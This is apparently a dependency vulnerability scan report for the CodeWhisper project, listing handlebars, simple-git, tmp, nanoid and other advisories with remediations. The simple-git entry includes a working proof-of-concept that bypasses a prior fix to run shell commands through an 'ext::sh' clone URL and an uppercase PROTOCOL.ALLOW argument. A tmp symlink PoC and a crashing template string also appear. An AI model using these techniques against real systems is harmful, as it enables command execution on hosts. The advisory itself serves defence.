Vulnerabilities

 13 via 27 paths

Dependencies

 245

Source

 GitHub

Commit

 d1b581b0

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 4
  • 2
  • 5
  • 2
Status
  • 13
  • 0
  • 0

critical severity
new

Access of Resource Using Incompatible Type ('Type Confusion')

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the compile function. An attacker can execute arbitrary code by supplying a crafted Abstract Syntax Tree (AST) object with a malicious NumberLiteral value, which is emitted directly into generated JavaScript code without proper sanitization.

Note: This allows the attacker to inject and run arbitrary commands on the server. This is only exploitable if user-controlled JSON is deserialized and passed directly to the compile function.

Workaround

This vulnerability can be mitigated by validating that the input to the compile function is always a string and not a plain object or JSON-deserialized value, or by using the runtime-only build where compile is unavailable.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability report

critical severity
new

Improper Handling of Case Sensitivity

  • Vulnerable module: simple-git
  • Introduced through: simple-git@3.25.0

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 simple-git@3.25.0
    Remediation: Upgrade to simple-git@3.32.3.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity in the preventProtocolOverride function, which fails to properly validate case-insensitive configuration keys. An attacker can execute arbitrary OS commands by supplying a malicious -c PROTOCOL.ALLOW=always argument and a crafted repository URL, leading to command execution on the host system.

Note:

This is caused by an incomplete fix to CVE-2022-25912.

PoC

/**
 * Proof of Concept — simple-git preventProtocolOverride Case-Sensitivity Bypass
 *
 * CVE-2022-25912 was fixed in simple-git@3.15.0 by adding a regex check
 * that blocks `-c protocol.*.allow=always` from being passed to git commands.
 * The regex is case-sensitive. Git treats config key names case-insensitively.
 * Passing `-c PROTOCOL.ALLOW=always` bypasses the check entirely.
 *
 * Affected : simple-git >= 3.15.0 (all versions with the fix applied)
 * Tested on: simple-git@3.32.2, Node.js v23.11.0, git 2.39.5
 * Reporter : CodeAnt AI Security Research (securityreseach@codeant.ai)
 */

const simpleGit = require('simple-git');
const fs = require('fs');

const SENTINEL = '/tmp/pwn-codeant';

// Clean up from any previous run
try { fs.unlinkSync(SENTINEL); } catch (_) {}

const git = simpleGit();

// ── Original CVE-2022-25912 vector — BLOCKED by the 2022 fix ────────────────
// This is the exact PoC Snyk used to report CVE-2022-25912.
// It is correctly blocked by preventProtocolOverride in block-unsafe-operations-plugin.ts.
git.clone('ext::sh -c touch% /tmp/pwn-original% >&2', '/tmp/example-new-repo', [
  '-c', 'protocol.ext.allow=always',   // lowercase — caught by regex
]).catch((e) => {
  console.log('ext:: executed:poc', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');
  console.error(e);
});

// ── Bypass — PROTOCOL.ALLOW=always (uppercase) ──────────────────────────────
// The fix regex /^\s*protocol(.[a-z]+)?.allow/ is case-sensitive.
// Git normalises config key names to lowercase internally.
// Uppercase variant passes the check; git enables ext:: and executes the command.
git.clone('ext::sh -c touch% ' + SENTINEL + '% >&2', '/tmp/example-new-repo-2', [
  '-c', 'PROTOCOL.ALLOW=always',       // uppercase — NOT caught by regex
]).catch((e) => {
  console.log('ext:: executed:', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');
  console.error(e);
});

// ── Real-world scenario ──────────────────────────────────────────────────────
// An application cloning a legitimate repository with user-controlled customArgs.
// Attacker supplies PROTOCOL.ALLOW=always alongside a malicious ext:: URL.
// The application intends to clone https://github.com/CodeAnt-AI/codeant-quality-gates
// but the injected argument enables ext:: and the real URL executes the command instead.
//
// Legitimate usage (what the app expects):
//   simpleGit().clone('https://github.com/CodeAnt-AI/codeant-quality-gates',
//                     '/tmp/codeant-quality-gates', userArgs)
//
// Attacker-controlled scenario (what actually runs when args are not sanitised):
const LEGITIMATE_URL = 'https://github.com/CodeAnt-AI/codeant-quality-gates';
const CLONE_DEST     = '/tmp/codeant-quality-gates';
const SENTINEL_RW    = '/tmp/pwn-realworld';
try { fs.unlinkSync(SENTINEL_RW); } catch (_) {}

const userArgs   = ['-c', 'PROTOCOL.ALLOW=always'];
const attackerURL = 'ext::sh -c touch% ' + SENTINEL_RW + '% >&2';

simpleGit().clone(
  attackerURL,   // should have been LEGITIMATE_URL
  CLONE_DEST,
  userArgs
).catch(() => {
  console.log('real-world scenario [target: ' + LEGITIMATE_URL + ']:',
    fs.existsSync(SENTINEL_RW) ? 'PWNED — ' + SENTINEL_RW + ' created' : 'not created');
});

Remediation

Upgrade simple-git to version 3.32.3 or higher.

References

Improper Handling of Case Sensitivity vulnerability report

critical severity
new

Access of Resource Using Incompatible Type ('Type Confusion')

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via manipulation of the @partial-block variable in the template data context. An attacker can execute arbitrary JavaScript code on the server by overwriting @partial-block with a crafted Handlebars AST and triggering its evaluation through a subsequent invocation.

Note: This is only exploitable if helpers that accept arbitrary objects are registered and allow mutation of the data context.

Workaround

This vulnerability can be mitigated by using the runtime-only build require('handlebars/runtime'), auditing registered helpers to prevent writing arbitrary values to context objects, and avoiding registration of helpers from third-party packages in contexts where templates or context data can be influenced by untrusted input.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability report

critical severity
new

Access of Resource Using Incompatible Type ('Type Confusion')

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the resolvePartial and invokePartial functions. An attacker can execute arbitrary code on the server by supplying a crafted object as a dynamic partial in the template context, which is then compiled and executed as JavaScript.

Note: This is only exploitable if the template uses dynamic partial lookups and the attacker can control the context property used for the lookup.

Workaround

This vulnerability can be mitigated by using the runtime-only build require('handlebars/runtime'), sanitizing context data to prevent non-primitive objects from being passed to dynamic partials, or avoiding dynamic partial lookups when context data is user-controlled.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability report

high severity
new

Improper Check for Unusual or Exceptional Conditions

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions through the registerDecorator path in lib/handlebars/compiler/javascript-compiler.js. An attacker can crash the Node.js process by supplying a template with malformed or unregistered decorator syntax, causing the compiled template to call an undefined decorator as a function. This affects applications that compile untrusted templates at request time, especially when the compile/render call is not wrapped in try/catch. A single malicious template such as {{*n}} can trigger an unhandled TypeError and terminate the process.

Workarounds

  • Wrap compilation and rendering in try/catch.
  • Validate template input before passing it to compile(), and reject decorator syntax if decorators are not used.
  • Use pre-compilation at build time and avoid calling compile() on request-time input.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Improper Check for Unusual or Exceptional Conditions vulnerability report

high severity
new

Improper Encoding or Escaping of Output

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the CLI precompiler in lib/precompiler.js. An attacker can execute arbitrary JavaScript in the generated bundle by supplying crafted template filenames or CLI options such as --namespace, --commonjs, --handlebarPath, or --map. The issue affects the precompiler output path used by bin/handlebars / lib/precompiler.js, where untrusted names and option values were concatenated into emitted JavaScript without escaping.

Workarounds

  • Validate template filenames and CLI option values before invoking the precompiler and reject values containing JavaScript string-escaping or statement-breaking characters.
  • Use a fixed, trusted namespace string rather than passing it from the command line in automated pipelines.
  • Run the precompiler in a sandboxed environment with limited write access.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Improper Encoding or Escaping of Output vulnerability report

medium severity

Symlink Attack

  • Vulnerable module: tmp
  • Introduced through: inquirer@9.2.23 and @inquirer/prompts@5.3.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 inquirer@9.2.23 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 @inquirer/prompts@5.3.8 @inquirer/editor@2.2.0 external-editor@3.1.0 tmp@0.0.33

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.

PoC

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher.

References

Symlink Attack vulnerability report

medium severity

Incorrect Behavior Order

  • Vulnerable module: ai
  • Introduced through: ai@3.3.9

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9
    Remediation: Upgrade to ai@5.0.52.

Overview

ai is an AI SDK by Vercel - The AI Toolkit for TypeScript and JavaScript

Affected versions of this package are vulnerable to Incorrect Behavior Order via the downloadAssets function. An attacker can upload files with disallowed types by substituting arbitrary downloaded bytes for different supported URLs within the same prompt, thereby bypassing the URL and filetype whitelisting.

Workaround

Implementing custom file type validation logic outside of the SDK.

Remediation

Upgrade ai to version 5.0.52, 5.1.0-beta.9 or higher.

References

Incorrect Behavior Order vulnerability report

medium severity
new

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution in the protoAccessControl function. An attacker can gain unauthorized access to prototype methods by referencing __lookupSetter__ in templates through untrusted input.

Note: This is only exploitable if the allowProtoMethodsByDefault option is set to true.

Workaround

This vulnerability can be mitigated by not enabling the allowProtoMethodsByDefault option, or by ensuring templates do not reference __lookupSetter__ through untrusted input.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Prototype Pollution vulnerability report

medium severity
new

Time-of-check Time-of-use (TOCTOU) Race Condition

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition in the lookup function. An attacker can access properties that should be restricted by bypassing prototype-access controls through a time-of-check time-of-use (TOCTOU) flaw, where the security check and the actual property access are decoupled.

Note: This is only exploitable if the { compat: true } compile option is enabled.

Workaround

This vulnerability can be mitigated by avoiding the { compat: true } option and ensuring context data objects are plain JSON without Proxies or getter-based accessor properties.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability report

medium severity

Improper Input Validation

  • Vulnerable module: nanoid
  • Introduced through: ai@3.3.9, @ai-sdk/anthropic@0.0.43 and others

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 @ai-sdk/anthropic@0.0.43 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to @ai-sdk/anthropic@0.0.53.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 @ai-sdk/openai@0.0.48 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to @ai-sdk/openai@0.0.70.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ollama-ai-provider@0.12.0 @ai-sdk/provider-utils@1.0.7 nanoid@3.3.6
    Remediation: Upgrade to ollama-ai-provider@0.16.0.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/ui-utils@0.0.33 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/react@0.0.45 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/solid@0.0.36 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/svelte@0.0.38 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/vue@0.0.37 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/react@0.0.45 @ai-sdk/ui-utils@0.0.33 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/solid@0.0.36 @ai-sdk/ui-utils@0.0.33 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/svelte@0.0.38 @ai-sdk/ui-utils@0.0.33 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.
  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 @ai-sdk/vue@0.0.37 @ai-sdk/ui-utils@0.0.33 @ai-sdk/provider-utils@1.0.13 nanoid@3.3.6
    Remediation: Upgrade to ai@3.4.20.

Overview

Affected versions of this package are vulnerable to Improper Input Validation due to the mishandling of fractional values in the nanoid function. By exploiting this vulnerability, an attacker can achieve an infinite loop.

Remediation

Upgrade nanoid to version 3.3.8, 5.0.9 or higher.

References

Improper Input Validation vulnerability report

low severity

Cross-site Scripting (XSS)

  • Vulnerable module: jsondiffpatch
  • Introduced through: ai@3.3.9

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 ai@3.3.9 jsondiffpatch@0.6.0
    Remediation: Upgrade to ai@5.0.0.

Overview

jsondiffpatch is a JSON diff & patch (object and array diff, text diff, multiple output formats)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin. An attacker can inject malicious scripts into HTML payloads that may lead to code execution if untrusted payloads were used as source for the diff, and the result renderer using the built-in html formatter on a private website.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade jsondiffpatch to version 0.7.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

low severity
new

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.8

Detailed paths

  • Introduced through: codewhisper@gmickel/CodeWhisper#d1b581b0e85cd34680aef8a3ee4caa8e7c3796e3 handlebars@4.7.8
    Remediation: Upgrade to handlebars@4.7.9.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution via the resolvePartial function. An attacker can inject malicious scripts into rendered output by polluting Object.prototype with a key matching a partial reference, causing unescaped content to be rendered.

Note:

This is only exploitable if the attacker knows or can guess the name of a partial reference used in a template.

Workaround

This vulnerability can be mitigated by applying Object.freeze(Object.prototype) early in application startup or by using the runtime-only build, which reduces the attack surface.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

Prototype Pollution vulnerability report